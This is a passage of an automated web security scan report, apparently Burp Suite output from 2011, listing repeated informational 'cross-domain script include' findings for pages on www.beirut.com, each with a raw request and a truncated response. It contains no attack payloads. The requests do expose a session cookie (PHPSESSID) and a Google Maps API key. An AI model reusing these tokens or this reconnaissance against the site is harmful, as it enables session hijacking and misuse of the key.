Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61123

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.690. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Commercial-Centers/12

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Shopping-Centers/492064852/Commercial-Centers/12 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:51:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.691. http://www.beirut.com/Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Shopping-Centers/492064852/Shopping-Malls/10

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Shopping-Centers/492064852/Shopping-Malls/10 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:48:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57090

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.692. http://www.beirut.com/Shopping/Specialized-Stores/2572668008

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Specialized-Stores/2572668008

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Specialized-Stores/2572668008 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 08:49:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.693. http://www.beirut.com/Shopping/Stores-Markets/3546182765

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:11:32 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.694. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Department-Store/68

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Department-Store/68

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765/Department-Store/68 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:02:43 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.695. http://www.beirut.com/Shopping/Stores-Markets/3546182765/MiniMarket/75

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/MiniMarket/75

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765/MiniMarket/75 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:03:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.696. http://www.beirut.com/Shopping/Stores-Markets/3546182765/Supermarket/63

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Stores-Markets/3546182765/Supermarket/63

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Stores-Markets/3546182765/Supermarket/63 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:58:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.697. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Toys-Gifts-Electronics/849778728

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Toys-Gifts-Electronics/849778728 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:24:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.698. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Toys-Gifts-Electronics/849778728/Consumer-Electronics/13 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:13:05 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61682

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.699. http://www.beirut.com/Shopping/Toys-Gifts-Electronics/849778728/Toys-Gifts-Gadgets/22

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Toys-Gifts-Electronics/849778728/Toys-Gifts-Gadgets/22

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Toys-Gifts-Electronics/849778728/Toys-Gifts-Gadgets/22 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.700. http://www.beirut.com/Theaters/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Theaters/1

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Theaters/1 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:25:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.701. http://www.beirut.com/ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://maps.google.com/maps?file=api&v=2&key=ABQIAAAAS4ALcddqQfCVl4qW8WNXjxQOZkr8emkM8We34fTRGXLtNVaXsBRz4HADkHE_typcnwzCvD3yuUulQw
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /ThingsToDo/Ain-El-Mreisseh/Family-Fun-Day/6097 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
